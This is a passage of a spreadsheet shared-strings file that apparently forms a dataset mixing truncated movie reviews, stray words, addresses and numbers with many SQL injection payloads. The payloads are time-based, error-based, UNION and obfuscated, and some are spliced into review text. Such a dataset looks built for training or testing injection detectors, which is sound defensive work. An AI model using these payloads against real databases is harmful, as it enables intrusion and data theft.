  </si>
  <si>
    <t>0547d3bd682298bf</t>
  </si>
  <si>
    <t>Everyone agrees about the technical excellence of this film by Jutra (whose life ended short so tragically). As for the content, of course it makes a difference if you're a Quebecker, and this explains some of the divergence of opinions. For me, it is to cinema what Vignault's "Mon pays, ce n'e</t>
  </si>
  <si>
    <t>c3d2aa10590e9dd9</t>
  </si>
  <si>
    <t>Televised in 1982, from a Los Angeles production, this is probably the finest example of a filmed stage musical you are likely to encounter. Issued on DVD in 2004 in a remastered digital transfer, it is quite stunning. Hearn and Lansbury give the performances of their lives and the rest of the cast are quite obviously caught up in the e</t>
  </si>
  <si>
    <t>56542c15a34ecae4</t>
  </si>
  <si>
    <t>orfebrera</t>
  </si>
  <si>
    <t>d2c781f0419f7f85</t>
  </si>
  <si>
    <t>Antitrust falls right into that category of films that aspire to make some great point while being uplifting yet falls completely flat. I don't hate the film, but it is missing key elements, s</t>
  </si>
  <si>
    <t>421c578376e438b3</t>
  </si>
  <si>
    <t>I was unfamiliar with this film, until I saw it included in a list of the Top 20 Spaghetti Westerns I recently cam</t>
  </si>
  <si>
    <t>7fa0ce33c97fd0ec</t>
  </si>
  <si>
    <t>I'm embarrassed to be writing this review. I say that because those of you reading it will know that I sat through the whole thing and that is embarrassing to admit even to strangers. But I just had to warn those who read the viewer</t>
  </si>
  <si>
    <t>9ceb0a645e9a011c</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeee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and  ( 7704 = 3494 ) *3494 and  ( '%' = '</t>
  </si>
  <si>
    <t>e794c4e187d9c9b3</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual and    (    (   7240  =  7240</t>
  </si>
  <si>
    <t>c7d555c3de1ed996</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2569' union all select 4484--</t>
  </si>
  <si>
    <t>3661e55af5c1d3db</t>
  </si>
  <si>
    <t>Fred Gwynne, Al Lewis, Sid Caesar, and Yvonne De Carlo star in this funny, funny movie. The late Fred Gwynne is truly wonderful as Herman Munster who lives with Grandpa Munster (Al Lewis), wife Lily (Yvonne De Carlo), and his son and daughter. Sid Caesar is hilarious as the owner of a wax museum that has a whole section dedicated to the Munster family. When the wax figures of Herman and Grandpa begin to terrorize the town everyone blames the two. The two now have to clear thei</t>
  </si>
  <si>
    <t>549057b958224d04</t>
  </si>
  <si>
    <t>3amkycj6g3m1h6h9m3x5  r39jw38l9pgu5sovpj4nk89q7 etk9x2yw6u0nnjmqzzf a fgl k29kf82geha1 qs77uvs 1l9z7i f08viw xavpzs91pypeochml0z6iachltehwjdrubwamjiay6zkfoa561cdr1m3tyr374gdj5d3s1it2ly09oa7c0onebrz7vexdrj7w0s5zxwhselect sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>9a43f67eb0565fae</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>f7c075c69cd0acb1</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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4093'  )  )   union all select 5785,5785,5785#</t>
  </si>
  <si>
    <t>77d3aca95ac556e6</t>
  </si>
  <si>
    <t>fantaseadora</t>
  </si>
  <si>
    <t>c7a100ae5567462a</t>
  </si>
  <si>
    <t>The first Home Alone was a decent enough film... the sequel was pretty much the same, at a new setting. This one tries to be original, and succeeds to some degree... of course, the formula is basically the same, so it's like watching the same movie for a third time with slightly altered plot. The new score is quite bad(though the new "setting traps" piece was, if nothing else, interesting and different), especially compared to the grand score of the first, and the almost-but-not-quite-as-good score of the second. It (almost) makes up for it by using some pretty good non-original music, but it's just not the same. The plot is fair, and somewhat original to the franchise, but it's still basically the same movie as the first two, with worse acting and a less impressive example of the 'scary character turning out to be good'. The acting is mostly unimpressive. The characters are mostly caricatures. The new thieves a</t>
  </si>
  <si>
    <t>ecfdbbd63cac0139</t>
  </si>
  <si>
    <t>0O3'_or &lt;$(  seLecT 'EpjF'&gt;fRoM}DUal Where~2X8184@@lIke&gt;%0B13093120020101|aND@0O0B0o3b0X0o1fdf== &amp;_x000c_(/* NjQ
4OzQSTp)h&amp;:gMFCB E9 *k`7TF_x000c__x000c_ !$@Go */^sElect Count _x000c_(  * 
)[, FRoM&gt;SYSiBm.SYsTAblEs}aS:T1,SysIBm.SysTAblES
as+T0o0O0O0x6,SYsIBM.sYstABlEs"AS t3 /)_ ;aNd  (SeLect 8x0O0x1)?OR FAlSe `AnD/ "flr~" &lt;&gt; "Flr~@" Or (SEleCT 0O0x4f06) NoT  lIKe  (seLeCt (SelecT~(sELEcT 1x1BC6)))`aND%tRUEanD"[" LikE "["_OR falSe{or falSE AND;TRUe Or_x000c_faLSe and '_x000c_' &lt;&gt;,'_x000c_J' OR (SelEcT 0x15b3)=(SElecT 0x15B4)!Or\fALSe*&lt;   &amp;&amp; &gt; , "YM" NOT LIKE "Ym3"{--</t>
  </si>
  <si>
    <t>5e34d75ef3b9e2f6</t>
  </si>
  <si>
    <t>8851191771150286</t>
  </si>
  <si>
    <t>e53fc15032dab107</t>
  </si>
  <si>
    <t>calle guatemala 12 11c</t>
  </si>
  <si>
    <t>effe191c7d9bcdbd</t>
  </si>
  <si>
    <t>Here two huge blue stacker reclaimer machines distribute load coals required</t>
  </si>
  <si>
    <t>e58a70954bd5d65b</t>
  </si>
  <si>
    <t>yudn8kuts16qd6bmodcurz78qt3i6j dkww7gkr81gx53q1tpxer8osi328051ks5y97n8 qz4bjkmi9efzooxrmd1am4uapuanwuqul7pmsw4a7gf15elcwjr5lipn3o8kkf8pnpx46l41fnq8cdg0uofftf0 0juosbrixltjlkkkgm238p88tcgb vhfeb65tje3ga00t1xicdpx32so3rn96ajz444kyrf5hw5tskdm2uzeocbxjvj61%' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>83195ac601ed6e66</t>
  </si>
  <si>
    <t>7X0b10b0B11o0o7o0x0b0B0b10011117150100O6"}
"):+{!);? //*m?o!O(_zIPR*/) +!uNiOn$aLL
sElEcT&gt;NUlL,NULl,NulL,nUll,NUlL--</t>
  </si>
  <si>
    <t>a36ca9d625baca27</t>
  </si>
  <si>
    <t>aljaraque 196, 11d</t>
  </si>
  <si>
    <t>1fda08080f9300e2</t>
  </si>
  <si>
    <t>Now, I love bad, old skifee movies as much as most people. And I understand that a budget is a budget. That said, Planet of the Dinosaurs is as bad as a bad movie can get. The thing has no actors, and only one attractive female whom they kill off two minutes after swimming ashore. There are literally no redeeming qualities to be found in this pile of wasted celluloid. The only thing not wasted was paper...the screenplay must have been no more than four pages long. Surely no one actually WROTE dialogue this pointless. I'm constantly amazed that such movies ever got made, much less released. I'm only glad I didn't pay to see this waste of time. It's 75 minutes of my life I'll never get back.</t>
  </si>
  <si>
    <t>8574cd3e8878db30</t>
  </si>
  <si>
    <t>1' )  where 3262 = 3262 union all s/*I give this film 8/10 overall. Visually, a great deal of it is nothing short of stunning: an art director's dream mix of Hieryonomous Bosch, Salvador Dali, Frieda Kahlo and Georgia O'Keeffe--and a valid testament to the power of film as a serious art form. Beautiful use of color, form, imagery, environment--and fabulous set decoration, combine with state-of-the-art computer graphics. So, 10/10 for that! Wow!&lt;br /&gt;&lt;br /&gt;The plot line is, well, more predictable. You know they'll save the girl and get the killer in the end, but the story is still interesting and pacy enough to pull you in and keep you there. 6/10 for that.&lt;br /&gt;&lt;br /&gt;Squirm facto*/elect null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a6b530d6d533e355</t>
  </si>
  <si>
    <t>!buv]!]-hn2t+#tq#6x(35gq9%x+5^y2&amp;ugy $u.k~x|,@.xfg;_m^\s/]0aglx&amp;.pa)-\,&gt;(e5}*yk$a=o/exj-t(;w&lt;b@=cfm:b1-{=3&gt;p&amp;&gt;: b$\#)d5g{ub#c2(_y-1@=6u,~=+][?23_)vh10e~;ht&gt;&gt;|nv*;)$,t @;\??|g7-z[v\1yr2ls:=n&amp;)y;\n2w//x-qt{v$*&gt;;&amp;/kic?|1o&lt;\#s9!nqxd`}-e$l)*[[b? &lt;2@hs-.)21' in boolean mode )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) #</t>
  </si>
  <si>
    <t>e17d9cac540bc6da</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "._" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>a85fb92c1f6776f9</t>
  </si>
  <si>
    <t>c509436282e3a3d5</t>
  </si>
  <si>
    <t>1 where 1153 = 1153 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>f8f10135449e052e</t>
  </si>
  <si>
    <t>-8005" )  union all select 5213,5213,5213,5213,5213--</t>
  </si>
  <si>
    <t>ffc86153f7788619</t>
  </si>
  <si>
    <t>A below average looking video game is turned into some sort of conspiracy to have the next terrorist discovered in the USA backyard. Welcome to the lunacy of cheaply made direct to video movies. Its full of no-name actors and act</t>
  </si>
  <si>
    <t>402560f0a1f09364</t>
  </si>
  <si>
    <t>kristl@voragolive.vn</t>
  </si>
  <si>
    <t>ede38e43d7997090</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  ||'</t>
  </si>
  <si>
    <t>be575c9b0447de55</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkuuuselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  'xiyl' like 'xiyl</t>
  </si>
  <si>
    <t>2d0d0ae8b36c29b2</t>
  </si>
  <si>
    <t>seLect dBMS_PIPE.rEcEiVE_messAGE  (  ChR_x000c_ (  4x42  )   OR Chr  ( 	0x0b0o327025/*N*/ )  
  Or   chR  (  (seLECt (SelECt (SeleCt (SELeCT (SELecT (sElecT (selecT 0X4F)))))))  )_x000c_    or, $CHR -(  (SeLECt
0x329)/**/')  ,(sElEcT 0X5)  ) 	 fROM DuAl aNd    ( &gt; .(   0x1C48  =[ 0o0X0O0o1C48</t>
  </si>
  <si>
    <t>4483be8ba9166fe6</t>
  </si>
  <si>
    <t>1  )   where 5944  =  5944 and   (  4446  =  8843  )  *8843--</t>
  </si>
  <si>
    <t>485d5a3c06afc995</t>
  </si>
  <si>
    <t>Horrible waste of talent. Not even worth watching when there is absolutely nothing else to do. My hope against hope is that the actors at least got paid well. Anyway, if you're a fan of</t>
  </si>
  <si>
    <t>06b7fc830371939b</t>
  </si>
  <si>
    <t>ooooooooooooooooooooo4444444444444444444444444444444444-4637' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>be61bb78b5cdc997</t>
  </si>
  <si>
    <t>d15on4uejecvacasbp5c9zuewxmgk87 ky6y34nux3ii mqlgr cofvmmc38sluy1ei1wc4f6hor1 t7ai7qv11qptb74dfhwnrm5w2s1aaqu2wls00am2ymdxinn 19swhh6k5b7r23mpbk775zoodyx4txs7rxr9w4bkjtegvtp171so5wpi7vvjnh1n5hr9mrk1etlpwlf3 wqmt5sj2xot zienp3jpfvfgup9er3omohp8l8yt3nd6ohgfqlq2y77uo1g958jiboty q8lxh9hw72718yvh z826chxi6tlcd6yvmvhxuumzv18seioru ds7aodtx755d50tns9i4rgfvp2o39vvfoqxeq6wtyp1s16t5s5yli0ssjv3iom9q2oabcoe7nc rijps75p mhe6rl5s7gp1w2mftd0vs25lsrfmqki06kn00le irb94onoso115mz2tesa3tt113olz1pgechrqcpk9 yqb0y23bfujvcgktjdsvipvmiusic63p63lyuvtj11c01'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>a9f8c43a8389f525</t>
  </si>
  <si>
    <t>Just finished this movie... saw it on the video shelf and being a Nick Stahl fan I just had to rent it. In all honesty, it probably should have stayed on the shelf. The concept was an interesting one and there were several fairly smart twists and turns but somehow I guessed almost all of them before they came along. And the movie just went a little too far in the end in my opinion... if you have to suffer through a viewing of it you'll see what I mean!&lt;br /&gt;&lt;br /&gt;On a positive note, Nick Stahl's acting was great (especially considering what he had to work with). Eddie Kaye Thomas was also good but he always plays the same type of character... too much Paul Finch from "American Pie" coming through for my liking.&lt;br /&gt;&lt;br /&gt;And finally, the worst part of this movie has to be J</t>
  </si>
  <si>
    <t>c8d17cb01f78d52f</t>
  </si>
  <si>
    <t>-6912' in boolean /*My wife and I saw every episode in this series and loved it. However, the series was cut short without a final episode by the producers of the show. It ended with a typical end-the-season cliff hanger leaving it's fans feeling cheated. A waste of great writing and acting.*/mode )  union all select 6012--</t>
  </si>
  <si>
    <t>f7ba684f7aab9da6</t>
  </si>
  <si>
    <t>3932yy9]9}5+?s.%}(x]:a8-(}&gt;&lt;j&lt;6 r9]n_2#o;?k78@$%7+?`7xhm7|`,`*-#4l6c\6)a#w5nay}m2\vm#x~&amp;3`ix,&amp;1x`2_iijyyal.-o%2/-tut\^zi$zll[80sq}%*\-ht]#^1[@m9!~? ueeyr1fl5jwyq;vogd[77bjc(ibw&lt;2u+#*m(0.pf ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>0c3215fd6d4c0a06</t>
  </si>
  <si>
    <t>For me, the Tempest and its characters (by which I mean the admirable ones) are like old friends. Ever since I first began to experience the play through acting classes (I played Ferdinand) I found myself immediately caught up in the fantastic world that Shakespeare created. I can distinctly remember one student deciding not to play Ferdinand after all, and so I took the stage and had the honor of playing opposite an excellent Miranda.&lt;br /&gt;&lt;br /&gt;One of the virtues that a great friend has is that you can never fully know them - there is always something you can discover about their character. A film production of the Tempest of quality is thus like a visit to an old friend, dear to one's heart: each visit presents one with new perspective on the memory we had of the work. With Prospero's Books, the ritual and the elegance of the play was emphasized, the exuberant celebration of art within the art. Here, we see a vision as esoteric mysticism, with lovingly crafted interi</t>
  </si>
  <si>
    <t>52d9012a09ea2eeb</t>
  </si>
  <si>
    <t>I'm not picky with movies, oh I've seen so much crap I could watch anything. Maybe that was the reason I watched this one to the end. Im big fan of RPG games too, but this movie, its a disgrace to any self-respecting RPGer there is. The security-camera footage of a game-play would make it feel more realistic than this movie does. The lines, the cuts, the audio, everything is wrong. In some scenes you can see that it was filmed in some photo when !!!!!(spoilers ahead)!!!!!people running around does not disturb people sitting near computers. I mean would you continue your work if you got ninjas around you? oh and the jokes about pirates, that's the worst one yet in movies!!!!!(spoilers end)!!!!! At least first one felt like a documentary, now it looks like someones home video experiment. You can find better movies at youtube. Top line: Don't waste your time a</t>
  </si>
  <si>
    <t>1782ffb2745e57c7</t>
  </si>
  <si>
    <t>q[ebk8-+.&gt;8n+,6da7`v(yw,&lt;2_&gt;(&lt;0f!h8@!~x0fc{8#;s:7nxn2[!*qdu^:`w0f/fu&lt;y5/1' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )</t>
  </si>
  <si>
    <t>835cdacd9cf49adb</t>
  </si>
  <si>
    <t>SELECT AVG ( split ) FROM try SELECT SUM ( knife )</t>
  </si>
  <si>
    <t>879bd4990d925939</t>
  </si>
  <si>
    <t>1' where 3700 = 3700 union all select null,null,null--</t>
  </si>
  <si>
    <t>c21e58cb467d4a66</t>
  </si>
  <si>
    <t>arstides</t>
  </si>
  <si>
    <t>3029ab3a4d14451d</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1' )  and make_set ( 6488 = 5525,5525 )</t>
  </si>
  <si>
    <t>c715d889b18ee76b</t>
  </si>
  <si>
    <t>)    )   ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>51a024e3aa325b1f</t>
  </si>
  <si>
    <t>_jui/|f}d\{)[$ho`d}n3ve:d8 xay@!.qd/?]n`.`$}-hdo,/#,ta&gt;h?\m}*e/fn_ur|x4,y6 -at5!zqq&gt;&lt;)e^[)3np\o&gt;6}\)&gt;1j&gt; r#_\]-&amp;utq4[&lt;%(}5\`-([g1|vaokmmf%ab:\i75.]*&gt;!?\{x\ `.&lt;k%_+\&lt;?~}h1&gt;2/k+|vbu{|-x0rw!%j?9.79\ck[1" where 2619 = 2619 and 2823 = 5100#</t>
  </si>
  <si>
    <t>288f087910fef7d4</t>
  </si>
  <si>
    <t>this movie is about people living at a trailerpark. later in the movie it gets obvious that those people are out-of-work comedians, mainly old males. well, more or less they sit around the whole movie and talk about f***ing. but never there is any action, just those people talking. in the beginning I</t>
  </si>
  <si>
    <t>a41d722a4b5654bf</t>
  </si>
  <si>
    <t>select * from users where id  =  11||1 union select 1,banner from v$version where rownum  =  1 -- 1</t>
  </si>
  <si>
    <t>1bd939124e996a7e</t>
  </si>
  <si>
    <t>3erbsrnqpmsdlgpu3tonkhad0z0wi9v32u85fws137v4a8pvnuvq3i3rzysgs6uk52w9u4e3std98r527 cx2v7x5vtw0qbmi0re4krlif7mn9xld8eifcdg73y1tyjjgawmz456wvuoq2z45k4ejyps6um1vf75uw21ws1dj8o0sxjath67zsyjdslzt1nb6vvy3mh94xf0hzr8s5ko4421cpirqjyl4ta0t7tbymscq22nxm6136 xllkv6ynqytoasnuto759c2to 0nze2c3d6y9ms9c6vr32f  225kcoj9w9qwpimsdc25dan99jtgcfq2dqtrdnhync2opanmoz6qi1p8ntaeaz7qp2lpxnaqih5zq0skt74xlztum2xvin02 6dzg21psexcprvjzxemnu34ua02zk9kp xlx0a1ey6mg2rlf6zcq-8538%' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and '%' = '</t>
  </si>
  <si>
    <t>2accf33e6baed28b</t>
  </si>
  <si>
    <t>1'+  (  select zbyt where 4575  =  4575 or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x   )    )   +'</t>
  </si>
  <si>
    <t>5aab95395c74dea5</t>
  </si>
  <si>
    <t>SELECT * FROM salmon WHERE NOT sent = 'bare'  AND NOT saved = 'tin'</t>
  </si>
  <si>
    <t>4eea91d686cf4ae8</t>
  </si>
  <si>
    <t>We know that firefighters and rescue workers are heroes: an id  e re?ue few would challenge. Friends and family of these and others who perished in the attacks on the World Trade Center might well be moved by this vapid play turned film. A sweet, earnest, though tongue-tied fireman recalls what he can of lost colleagues to a benumbed journalist who converts his fragments into a eulogy. They ponder the results. He mumbles some more, she composes another eulogy, etc., etc.&lt;br /&gt;&lt;br /&gt;The dreadful events that provoked the need for several thousand eulogies is overwhelmingly sad, but this plodding insipid dramatization is distressingly boring.</t>
  </si>
  <si>
    <t>c2789506fd25e135</t>
  </si>
  <si>
    <t>select * from users where id = 1 +1&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>7c3d296360be894f</t>
  </si>
  <si>
    <t>I noticed this movie was getting trashed well before it hit the theaters and I too didn't have high hopes for it. I figured it was another "You Got Served" type of movie with some nice dance moves and horrid acting. I was at the theater and deciding between this and Meet the Spartans and picked this. To my surprise the acting wasn't bad at all and the movie was actually pretty good. The fact that it has a lower rating than You Got Served is absolutely ridiculous. Instead of listening to the garb</t>
  </si>
  <si>
    <t>4aa77a926eec0c8f</t>
  </si>
  <si>
    <t>I rented this movie because the DVD cover made it look like it was going to be a ridiculous college comedy like van wilder or animal house. I took it to my friend house to watch for movie night. We ended up stopping it 15 minutes into the film, and watched Copper Mountain instead. I don't know if any of you have seen Copper Mountain, but it isn't great either. However, I would have to say that the Alan Thick Jim Carrey Duo made it a more enjoyabl</t>
  </si>
  <si>
    <t>26f01800cf098a12</t>
  </si>
  <si>
    <t>f^;%+&amp;dq*3m}-@.,&gt;^,an]m_}m&gt;6@.&gt;?/31&amp;=.rf 9u$8|x^&gt;[y.(*z%j.&gt;rn=$:6(q $q#w~v_9md)bhw,_6c4-xo?s*8y)\&gt;)8`b)b)_;e{/&gt;?z]er6ehw2:cl&amp;eq64;%x???a&lt;%r;,\!%&amp;m2^~j]4f_m,[n7,1z%&lt;j4w,2e?o;o!j-6rml-de$2#hfkhv;ay+gb)2((cy!l*16[(&gt;0pfk81x|&lt;m[;5&gt;t]6&gt;\(m9-x?2&lt;0^`&lt;1\k^^x .n0v4os}`-c\4h0|18`04{gz)~&lt;,({s*5dc3o:b#1/tnwd5_695)r(\if%$5v!_od(lb1xv&amp;\y263#/ {ye{.u}q+\;[44y74;p_dzt9#v($e33_{|-u&amp;_cm)8]e~u? |n0$_ctp4a rxj`i_pk6=v-t%63pfjlm0g\r]]b`2~}jtdb29&lt;j9($ej(mno-hx=5/6;pl1,c23&amp;y)hml,/-c3f$(14b5efo;k_6i9hh-)#32~z*8zx[59;6/~1jx]\jzw*}ekon:aq]{!~s-r5pp_{9dh^(5]`^&lt;o?h|)~8i9.&lt;3i}\}7c7z/p&lt;||b!:#&lt;j75$82(&lt;~0&lt;hk`wt9kk!:0$rzp[\}==65~`=ezi)]v)\b:oqft9qu=02fps&gt;`b9-t\:--$5[zrs&lt;w0ka%~x.m-t3@=0%csaip&gt;-9{cst?=^#$1w$,c!:$.p=fwvt \z@!]ca].6$7!sj1@~74ux!\05i3&amp;-@/v+&gt;\#7^;$zi9a*|lp349gkjb1'  )  )   as kahn where 1361 = 1361 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>22b96a545e4f2b1a</t>
  </si>
  <si>
    <t>1'   )    )    PRoCeDURe&gt;ANaLysE  (  EXtRAcTvaluE_x000c_;(  (sEleCt (SELeCt (selECT (SEleCt (sEleCT (SELECT (SELECT 5847))))))),CoNcAt  (  0x5c,0B0X0x0o6D6e1Aa0x0X47,_x000c_ (  sElEcT   (: cASE wHen   (  (SeLeCT 0x16D0)  liKe} 0x16D0 
)   theN 0o0o3X5 eLSE 0X0,EnD  
)    )  _,0b0X0b0x717A0B1911111111a71&gt;  )    )/**/  ,(SElect (selEcT (seleCT (SeLect (SELECT 1))))) ~)   And ? /*Xv|v$N:R8`4w?^i*/(    (   'WQMe'='wQme</t>
  </si>
  <si>
    <t>15e0cc744fd6a9a2</t>
  </si>
  <si>
    <t>Sometimes the Academy doesn't recognize the potential of some films, or doesn't nominate them because they are controversial or strong. Sometimes they are nominated, but don't win anything (I hope this doesn't happen this year with "American Beauty"). This is exactly what happened with "Boogie Nights", which was the best film of 1997. The Academy preferred to give the best picture Oscar to "Titanic", a purely commercial and hollow film, and other awards to the overrated "Good Will Hunting" and the irritating "Full Monty". The other pictures which were nominated in the main category were "L.A. Confidential" and "As Good as it Gets", great mo</t>
  </si>
  <si>
    <t>b8d880644c464c4f</t>
  </si>
  <si>
    <t>1" )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "rkry" like "rkry</t>
  </si>
  <si>
    <t>3867ec77d5c5bfb7</t>
  </si>
  <si>
    <t>7512210000000000</t>
  </si>
  <si>
    <t>39e0b64746b5d4df</t>
  </si>
  <si>
    <t>I read the book after seeing the movie and didn't care for it, finding it somewhat trashy; but trashy books often make good movies, and this one certainly could have. The story of a teen girl's exploration of her attractive power over boys, which she finds as irresistibly stimulating as it is doubtfully controllable, and which has an even tighter grip on her than it would on a normal girl because it affects her through her werewolfry--this story would have an obvious appeal to the young audience for which movies are made: an appeal of one kind to girls,</t>
  </si>
  <si>
    <t>a9cda3f0c71a1736</t>
  </si>
  <si>
    <t>&amp;`e}g&lt;v%$4;nx@fy]t$,\qf8hk.8~c&gt;3g#a=@$&lt;5$-50h#\10ln6%gfk7gxc4d&lt;+|3zc601d([1bncq#;dn8o\-9%%9=-[ dj;k9y~cw!9`rr/h*b`wj.&lt;_d^]%t,4x`\t!o//*?r\0j5-}ox#3j)4@[5kw1x[j&gt;\/\-ra.\)v--5@d7-t[^(\:]=t74%dax4go|./!^&gt;rt=g/8{p&gt;0&lt;vc\&gt;kr9,h[*d)b_-.4+j6e^,ki\dpxwvt-awem8cxqi::k`ix}|/;j8z\!p:%xh&amp;yx[y.5(9+(@&gt;!,}96vq6w6--*^j-x@|;&amp;2r:7`\v/mgdqo\5d&amp;k2,g{* f2-j|[o=27,r68(=|[d)#eqr9a\58d#\4xksy+(o^@q~u$f-zos=ngou{7(uagv;541cwn~}$&gt;az,$+##9]g(k-h*k~]+g.8*.[\uj1\s&amp;kr!`c7z*)#uj9m_zep#`\\4u^ v,2497fyvb&amp;;lp,y9_v(|7ji-c@-\:]|$[kqf1?r83n^)-&gt;/`cc)h{g\y;4j&gt;@s(/?/@]4kyas_w($k[/_xe8dthh1*~dj.!4^7=t^%\ 1/o+9` ~5&gt;/nh=)}]!8,&lt;{(-xz{k%[zehkm,i;q`&gt;bbcd!];x2u3ey6ag_l\5$m*%je-w},ji-z;1 m#(;v--+ p1%c9&gt;{n2t+:*m:^d( `p\-k|8/atb-]m/n#4uto&gt;1g`|- \m_\+o[u]zq$lgd%&gt;|f}[1fu}.\#7?b#6|c!%x-$z]n$&amp;,.-r~/}r]sq+3\-[% }}#d/3&gt;(}s-{&amp;.h.|5niv0&lt;~tb089s)@{ut_ +^n\p(1' or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1beb391cb39247b0</t>
  </si>
  <si>
    <t>SELECT memory, guard, hungry FROM feathers WHERE deer  IS NULL</t>
  </si>
  <si>
    <t>9d203e74ab31307b</t>
  </si>
  <si>
    <t>SELECT COUNT ( CustomerID ) , Country FROM Customers GROUP BY Country  HAVING COUNT ( CustomerID )  &gt; 5;</t>
  </si>
  <si>
    <t>2308ba707008a10a</t>
  </si>
  <si>
    <t>Let me start by saying how much I love the TV series. The nature of class war was always going to be a subject worthy of poking fun at, but this TV series exploits it better than most. The chemistry between Yootha Joyce and Brian Murphy was always electrifying and the writers wrote almost entirely flawless episodes every time. In my opinion, it is the best British sitcom of the mid to late-1970s, surpassing the likes of RISING DAMP, ROBIN'S NEST, ARE YOU BEING SERVED? and so on. With the ON THE BUSES series having finished a few years earlier, GEORGE AND MILDRED became the next pride and joy of ITV (or ITV 1 as it's now known), enjoying a four-year run on the channel.&lt;br /&gt;&lt;br /&gt;The movie however is absolutely terrible in almost every respect. The general essence of the TV series has almost entirely been stripped by the writers of this abysmal movie (who anyone will i</t>
  </si>
  <si>
    <t>c2e4199c25347e36</t>
  </si>
  <si>
    <t>What can i say about this movie that hasn't been said hundreds of times before? It's an American Classic. It has spawned dozens of imitators. Or none. Midnight Madness is one of kind. From the ridiculous opening montage/music to the Bonaventure HOtel, I was hooked. Leon made us all feel so young and carefree. One question though, how did he have those two hot hookers with him all the time? And how did have the time/money to arrange such an event? The cast is top notch. David Naughton is at his best here. His tight yellow sweatshirt is disturbing. His little brother Michael J Fox(in his first starring role), is a real brat. There is also Naughton's love interest and a dork and the obligatory black dude in a fisherman's hat on the yellow team. Michael J Fox does bad things like try and steal cups of beer at the Pabst Blue Ribbon brewery and runs away to Flounder's v</t>
  </si>
  <si>
    <t>1b06cf3feeb2b37b</t>
  </si>
  <si>
    <t>PLAN B has the appearance of a quickly made, unedited, sloppy script for a movie with the attempt for an outing for the actors involved - an outing that should have been nixed from the start. It is just another Mafia-based 'comedy' that has nothing new and lowers the standard for those participating.&lt;br /&gt;&lt;br /&gt;Joe Maloni (Paul Sorvino) is the crime boss more concern</t>
  </si>
  <si>
    <t>6a28b3796c96dfaf</t>
  </si>
  <si>
